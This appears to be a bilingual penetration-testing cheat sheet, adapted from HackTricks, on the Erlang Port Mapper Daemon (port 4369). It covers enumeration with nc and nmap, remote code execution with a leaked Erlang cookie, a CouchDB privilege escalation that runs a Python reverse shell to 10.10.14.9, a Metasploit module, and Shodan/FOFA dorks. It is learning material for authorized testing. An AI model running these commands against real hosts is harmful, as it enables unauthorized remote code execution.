--- title: "4369 - Epmd" weight: 4369 date: "2026-03-10T10:03:28+08:00" lastmod: "2026-03-10T13:26:55+08:00" --- 💡 **学习提示**: 本文档介绍 **4369 - Erlang Port Mapper** 的渗透测试方法,适合信息安全初学者和从业人员参考。 ⚠️ **法律声明**: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。 --- > ⚠️ **法律声明**: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。 ## 4369 渗透测试 Erlang 端口 Mapper Daemon (epmd) ### Basic Info The **Erlang 端口 Mapper Daemon (epmd)** serves as a coordinator for distributed Erlang instances. It is responsible for mapping symbolic node names to machine addresses, essentially ensuring that each node name is associated with a specific address. This role of **epmd** is crucial for the seamless interaction and communication between different Erlang nodes across a network. **默认 port**: 4369 ``` PORT STATE SERVICE VERSION 4369/tcp open epmd Erlang Port Mapper Daemon ``` This is used by default on RabbitMQ and CouchDB installations. ### 信息收集 #### Manual ```bash echo -n -e "\x00\x01\x6e" | nc -vn 4369 #Via Erlang, Download package from here: https://www.erlang-solutions.com/resources/download.html dpkg -i esl-erlang_23.0-1~ubuntu~xenial_amd64.deb apt-get install erlang erl #Once Erlang is installed this will promp an erlang terminal 1> net_adm:names(''). #This will return the listen addresses ``` #### Automatic ```bash nmap -sV -Pn -n -T4 -p 4369 --script epmd-info PORT STATE SERVICE VERSION 4369/tcp open epmd Erlang Port Mapper Daemon | epmd-info: | epmd_port: 4369 | nodes: | bigcouch: 11502 | freeswitch: 8031 | ecallmgr: 11501 | kazoo_apps: 11500 |_ kazoo-rabbitmq: 25672 ``` ### Erlang Cookie 远程代码执行 #### Remote Connection If you can **leak the 认证 cookie** you will be able to execute code on the host. Usually, this cookie is located in `~/.erlang.cookie` and is generated by erlang at the first start. If not modified or set manually it is a random string \[A:Z] with a length of 20 characters. ```bash greif@baldr ~$ erl -cookie YOURLEAKEDCOOKIE -name test2 -remsh test@target.fqdn Erlang/OTP 19 [erts-8.1] [source] [64-bit] [async-threads:10] Eshell V8.1 (abort with ^G) At last, we can start an erlang shell on the remote system. (test@target.fqdn)1>os:cmd("id"). "uid=0(root) gid=0(root) groups=0(root)\n" ``` More information in [https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/](https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/)\ The author also share a program to brutforce the cookie: epmd_bf-0.1.tar.bz2 #### Local Connection In this case we are going to abuse CouchDB to escalate privileges locally: ```bash HOME=/ erl -sname anonymous -setcookie YOURLEAKEDCOOKIE (anonymous@canape)1> rpc:call('couchdb@localhost', os, cmd, [whoami]). "homer\n" (anonymous@canape)4> rpc:call('couchdb@localhost', os, cmd, ["python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.9\", 9005));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"]). ``` 示例 taken from [https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution](https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution)\ You can use **Canape HTB machine to** **practice** how to **exploit this vuln**. #### Metasploit ```bash #Metasploit can also exploit this if you know the cookie msf5> use exploit/multi/misc/erlang_cookie_rce ``` ### Shodan - `port:4369 "at port"` --- --- --- ### 搜索引擎语法 #### FOFA ```bash # FOFA 搜索语法 port="4369" ``` #### Shodan ```bash # Shodan 搜索语法 port:4369 ``` #### ZoomEye ```bash # ZoomEye 搜索语法 port:4369 ``` --- ## 📖 参考资料 - [HackTricks - 4369-epmd](https://book.hacktricks.wiki/en/network-services-pentesting/4369-epmd.html)